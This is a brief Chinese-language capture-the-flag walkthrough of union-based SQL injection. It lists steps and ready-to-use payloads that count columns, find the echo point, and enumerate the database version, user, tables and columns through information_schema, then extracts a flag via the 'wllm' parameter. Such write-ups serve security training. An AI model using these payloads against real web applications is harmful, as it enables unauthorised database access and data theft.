1. 是否存在注入并且判断注入类型
2. 判断字段数 ' order by 数字 -- '
3. 确定回显点 -1 ' union select 1,2 -- '
4. 查询数据库信息 @@version @@datadir
5. 查询用户名,数据库名 user() database()
6. 查询表名 -1 ' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema='数据库名' -- '
7. 查询列名 -1 ' union select 1,2, group_concat(column_name) from information_schema.columns where table_name='表名' -- '
8. 查询flag -1 ' union select 1,2, group_concat(flag所在的列名) from 表名
用wllm参数试一下
/?wllm=1
判断字段数
/?wllm=-1 ' union order by 3 -- '
3可以,4不行,说明字段数为3
查看回显点
/?wllm=-1 ' union select 1,2,3 -- '
数据库信息
/?wllm=-1 ' union select 1, 2, @@version -- '
查询库名和用户名
/?wllm=-1 ' union select 1, 2, database() -- '
/?wllm=-1 ' union select 1, 2, user() -- '
6. 爆表
7. 爆列
先试试test_tb表
/?wllm=-1 ' union select 1, 2, group_concat(column_name) from information_schema.columns where table_name='test_tb' -- '
8. 查flag
/?wllm=-1 ' union select 1,2, group_concat(flag) from test_tb -- '